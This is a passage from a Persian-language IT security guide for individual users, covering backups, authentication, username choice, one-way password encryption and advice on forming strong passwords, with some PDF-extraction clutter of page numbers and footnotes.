‫ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﺯﺣﻤﺖ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﻧﻤـﻲﺩﻫﻨـﺪ ﻭ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻋﻮﺍﻗﺐ ﺍﻳﻨﻜﺎﺭ ﺧﻮﺩ ﮔﺮﻓﺘـﺎﺭ ﺷـﻮﻧﺪ‪ .‬ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ‬
‫ﻋﻤﻮﻣﹰﺎ ﻭﻗﺘﻲ ﻫﻢ ﻛﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﻣﻲﺷﻮﻧﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨـﺪ‬
‫ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ .‬ﻫﻤﭽﻨﺎﻥ ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳـﺖ‬
‫ﻛﻪ ﺍﺯ ﻣﺨﺎﻃﺮﺓ ﺍﺣﺘﻤﺎﻟﻲ ﭘﻴﺸﮕﻴﺮﻱ ﻛﻨﻴﺪ ﻭ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫‪٢٣‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪ ﺑﺪﺍﻧـﺪ‬
‫ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ‪ .‬ﺍﻳﻦ ﺩﺍﻧﺎﻳﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺍﺯ‬
‫ﻻ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ‬
‫ﺗﻘﻠﺐ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻋﺒﻮﺭ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻳﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﮔﻮﻧـﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻳـﻦ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟـﻪ ﺍﻳـﻦ ﺍﺳـﺖ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﻛﻠﻤﺎﺗﻲ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ‬
‫‪Authentication‬‬
‫‪23‬‬
‫‪٦١‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﺣﺘﻲ ﺣﺪﺱ ﺯﺩ ﺗﺎ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨـﺪ‪.‬‬
‫ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﺎﻳﺪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﻛﻠﻤﺎﺕ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﻴﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺑﺎﺷﺪ ﻭ ﺷﺨﺺ ﺁﻧﻬﺎ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﻣﺮﺗﺒﹰﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻭ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺗﻤﺎﺱ ﺑﺎﺷﻴﺪ ﻗﺎﻋﺪﺗﹰﺎ ﺗﺎ ﻛﻨﻮﻥ ﻧﺎﻣﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩﺍﻳـﺪ‪ ،‬ﺍﻣـﺎ ﺍﮔـﺮ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﺮ‬
‫ﺭﻭﻱ ﻳﻚ ﻛﺎﻏﺬ ﻧﺰﺩﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﺯ ﺍﻣﻨﻴﺖ‬
‫ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﻛـﻪ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺣﺮﺍﺯ ﻛﻨﻨﺪ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ‬
‫ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﻧﺠﺎﻡ ﺷـﻮﺩ‪ :‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﺷـﻤﺎﺭﺓ‬
‫ﻋﻀﻮﻳﺖ‪ ،‬ﺍﺳﻢ ﻋﻀﻮ ﻭ‪...‬؛ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺒﺎﺣـﺚ ﻋﻤﻮﻣـﹰﺎ ﺍﺯ ﻧـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲ ﺷـﻮﺩ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑﺠـﺎﻱ ﻧـﺎﻡ‬
‫ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﺷــﻮﺩ‪ .‬ﺩﺭ‬
‫ﺣﻘﻴﻘﺖ ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻧﻤﺎﺩﻱ ﺧﺎﺹ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻠﻘﻲ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﺩﺭ ﺧـﺼﻮﺹ ﻧـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﻱ ﻗﻮﺍﻧﻴﻦ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪:‬‬
‫•‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻃﻮﻝ ﺍﺳﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﻨـﺪ ﻭﻟـﻲ‬
‫ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻗﺎﺋﻞ ﻧﻤﻲﺷﻮﻧﺪ‪.‬‬
‫•‬
‫ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻫـﺮ ﻋﻼﻣﺘـﻲ ‪ -‬ﻛـﻪ‬
‫ﺑﻮﺳﻴﻠﺔ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﺑﺎﺷﺪ ‪ -‬ﺩﺭ ﺗﺮﻛﻴﺐ ﻧـﺎﻡ‬
‫ﻛــﺎﺭﺑﺮﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩ‪ ،‬ﻭﻟــﻲ ﺑﻌــﻀﻲ ﺩﻳﮕــﺮ ﻓﻘــﻂ ﺩﺭ‬
‫ﻣﺤﺪﻭﺩﺓ ﺣـﺮﻭﻑ ﻭ ﺍﻋـﺪﺍﺩ ﻭ ﻓﻘـﻂ ﺍﻧـﺪﻛﻲ ﺩﺭ ﻣﺤـﺪﻭﺩﺓ‬
‫ﻋﻼﺋﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺣـﺮﻭﻑ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﺭﺍ ﻳﻜـﺴﺎﻥ‬
‫ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ ﻭﻟﻲ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﻪ ﻣﻨﺰﻟـﺔ ﺩﻭ‬
‫ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﺍﻧﺘﺨﺎﺏ ﻧﺪﻫـﺪ‪ ،‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﺷـﻤﺎ‬
‫ﻫﻤﺎﻧﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺳﻴﺴﺘﻢ ﺗﻌﻴﻴﻦ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺍﮔﺮ‬
‫ﻻﺯﻡ ﺑﺎﺷﺪ ﺧﻮﺩﺗﺎﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﭼﻪ ﻧﻜـﺎﺗﻲ ﺭﺍ ﺑﺎﻳـﺪ‬
‫ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ؟ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫•‬
‫ﺁﻳﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ‬
‫ﺷﻤﺎ ﺑﺎﺷﺪ؟ ﺁﻳﺎ ﻗﺮﺍﺭ ﺍﺳـﺖ ﺍﻳـﻦ ﺍﺳـﻢ ﻛﻤـﻚ ﻛﻨـﺪ ﻛـﻪ‬
‫ﺩﻭﺳﺘﺎﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧﺘﺎﻥ ﺷـﻤﺎ ﺭﺍ ﺑـﺸﻨﺎﺳﻨﺪ؟ ﻳـﻚ ﺁﺩﺭﺱ‬
‫•‬
‫ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺎ ﺍﻧﺘﺨﺎﺏ ﻧﺎﻡ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ‬
‫ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻧﮕﻪ ﺩﺍﺭﻳﺪ؟ ﺍﮔﺮ ﺑﻮﺳﻴﻠﺔ ﺍﻳﻦ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻼ ﻳـﻚ ﺑـﺎﺯﻱ‬
‫ﺩﺭ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﮔﺮﻭﻫﻲ ﺷﺮﻛﺖ ﻣﻲﻛﻨﻴﺪ )ﻣﺜ ﹰ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ( ﺷﺎﻳﺪ ﻧﺨﻮﺍﻫﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺭﺍ‬
‫ﺑﺪﺍﻧﻨﺪ‪.‬‬
‫•‬
‫ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻧﺎﻣﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﺁﺳﺎﻥ‬
‫ﺑﺎﺷﺪ؟ ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻳﻚ ﺧﺪﻣﺖ ﺑﺮﺧﻂ‪ ٢٤‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛـﻪ‬
‫ﺑﻪ ﻧﺪﺭﺕ ﺁﻧﺮﺍ ﺑﻜﺎﺭ ﻣﻲ ﮔﻴﺮﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ‬
‫ﺍﺳﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﺩﺭ ﺫﻫﻦ ﺑﻤﺎﻧـﺪ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺍﻓﺮﺍﺩ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺁﻥ ﺧـﺪﻣﺎﺕ ﺑـﺎ ﻧﻜﺘـﺔ ﻣﻬـﻢ ﻭ‬
‫ﺣﺴﺎﺳﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺒﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺣﺪﺱ ﺯﺩﻥ ﻧﺎﻣﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ ﺑـﺮﺍﻱ‬
‫ﺩﻳﮕﺮﺍﻥ ﻣﺸﻜﻞ ﺑﺎﺷﺪ؟ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺷـﻤﺎ‬
‫ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻌﻴﻴﻦ ﺷﻮﺩ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺭﺍﺣﺘـﻲ‬
‫ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﻨﺪ )ﺟﻬﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺑﺎﻳـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﭼﻨﺪﻻﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺍﮔﺮ ﺍﺯ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻋﻤﻮﻣﻲ ﺧﻮﺩ‬
‫ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﺣـﺪﺱﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ‬
‫ﺳﺎﺭﻗﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ(‪.‬‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﺩﺭ ﺑﻌــﻀﻲ ﺳﻴــﺴﺘﻤﻬﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺳــﻮﻱ ﺳﻴــﺴﺘﻢ ﺗﻌﻴــﻴﻦ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻠﻤﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻫﺮ ﺻﻮﺭﺕ ﺗﻮﺳﻂ‬
‫ﻛﺎﺭﺑﺮ ﺗﻌﻴﻴﻦ ﻣﻲﮔﺮﺩﺩ ﻭ ﺷﻜﻞ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﺣﺪﺱ ﺯﺩﻧﺶ ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺩﻳﮕﺮ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ‪.‬‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺫﺧﻴـﺮﻩ ﻣـﻲﺷـﻮﻧﺪ‬
‫ﻻ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﻛﺴﻲ ﺑﻪ ﺩﻳﺴﻚ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﭘﻴﺪﺍ ﻛﺮﺩ ﻗﺎﺩﺭ ﺑﻪ ﻣﺸﺎﻫﺪﺓ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺒﺎﺷﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ‬
‫ﺍﻳﻦ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺭﻣﺰﻫـﺎﻱ‬
‫ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺁﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﺴﻮﻳﻪ‪ ٢٥‬ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﻗﺘﻲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺭﺍ ﻭﺍﺭﺩ‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺎ ﻧﺴﺨﺔ ﺫﺧﻴﺮﻩﺷﺪﻩ‬
‫‪Online Service‬‬
‫‪One-way Encryption‬‬
‫‪24‬‬
‫‪25‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ‬
‫ﻻ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭼﻨﻴﻦ ﻧﻤـﺎﺩﻱ ﺍﺯ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺎﺭﺑﺮ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪٦٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﺭ ﺩﻳﺴﻚ ﻣﻘﺎﻳﺴﻪ ﻣﻲﮔﺮﺩﺩ )ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺿﻤﻴﻤﺔ ‪ ۱‬ﻫﻤﻴﻦ‬
‫•‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺍﺯ ﺍﻋـﺪﺍﺩ ﺗﺮﻛﻴﺒـﻲ‪ ،‬ﻋﻼﻣﺘﻬـﺎﻱ ﻣﺠـﺎﺯ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﻓﻀﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻓـﻀﺎﻱ ﺧـﺎﻟﻲ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺑـﻪ ﺷـﻜﻞ ﻳـﻚ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﺻﻠﻪﻫﺎ ﺭﺍ ﺣـﺬﻑ‬
‫ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻟﻐﺎﺗﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﭼـﺴﺒﻴﺪﻩ‪-‬‬
‫ﺍﻧﺪ(‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺧﺎﻃﺮ ﺑـﺴﭙﺎﺭﻳﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﻤﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﻓﺮﺩﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ‬
‫ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﻛـﺸﻒ ﻛﻨـﺪ‪ ،‬ﺍﻣﻨﻴـﺖ‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﺁﻧﻬــﺎ ﺍﺯ ﺭﻣــﺰ ﻋﺒــﻮﺭ ﻣــﺸﺎﺑﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻳﺪ ﻧﻴﺰ ﺑﻪ ﺧﻄـﺮ ﺧﻮﺍﻫـﺪ ﺍﻓﺘـﺎﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ‬
‫ﭼﻨﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ‬
‫ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﻭ ﺩﻳﮕﺮ ﻣﻄﺎﻟﺐ‪ ،‬ﻧﻴﺎﺯﻱ ﺑـﻪ‬
‫ﭘﺮﺩﺍﺧﺖ ﭘﻮﻝ ﻳﺎ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻧﻴـﺴﺖ‪ ،‬ﺍﻣـﺎ‬
‫ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﻣﻘﺎﻻﺕ ﺑﻌﻀﻲ ﺍﺯ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬
‫ﻣﺮﺑﻮﻃﻪ ﺑﺎﻳﺪ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻭﺍﺭﺩ ﻛﻨﻴـﺪ‪.‬‬
‫ﺩﺭﻭﺍﻗﻊ ﺁﻧﻬﺎ ﻓﻘﻂ ﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺷﻤﺎ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺁﻧﻬـﺎ ﻭﺍﺭﺩ‬
‫ﺷـﻮﻳﺪ؛ ﺑﻨـﺎﺑﺮ ﺍﻳــﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑــﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻣﻄﺎﻟــﺐ‬
‫ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫•‬
‫ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺣﺮﻭﻑ ﺭﺍ ﺑﺎ ﻋﻼﺋﻢ ﻳﺎ ﺍﺭﻗﺎﻡ ﻣـﺸﺎﺑﻪ ﻋـﻮﺽ‬
‫ﻣﻲﻛﻨﻨﺪ؛ ﻣﺜ ﹰ‬
‫ﻼ ﺍﺯ ﺭﻗﻢ "‪ "1‬ﺑﺠـﺎﻱ ﺣـﺮﻭﻑ "‪ "I‬ﻳـﺎ "‪ ،"L‬ﺍﺯ‬
‫ﺷﻤﺎﺭﺓ "‪ "3‬ﻳﺎ ﻋﻼﻣﺖ "‪ "#‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪ ،"E‬ﺍﺯ ﺭﻗﻢ "‪"0‬‬
‫ﺑﺠﺎﻱ ﺣﺮﻑ "‪ ،"O‬ﺍﺯ ﻋﻼﻣﺖ "@" ﺑﺠﺎﻱ ﺣـﺮﻑ "‪ ،"A‬ﻭ‬
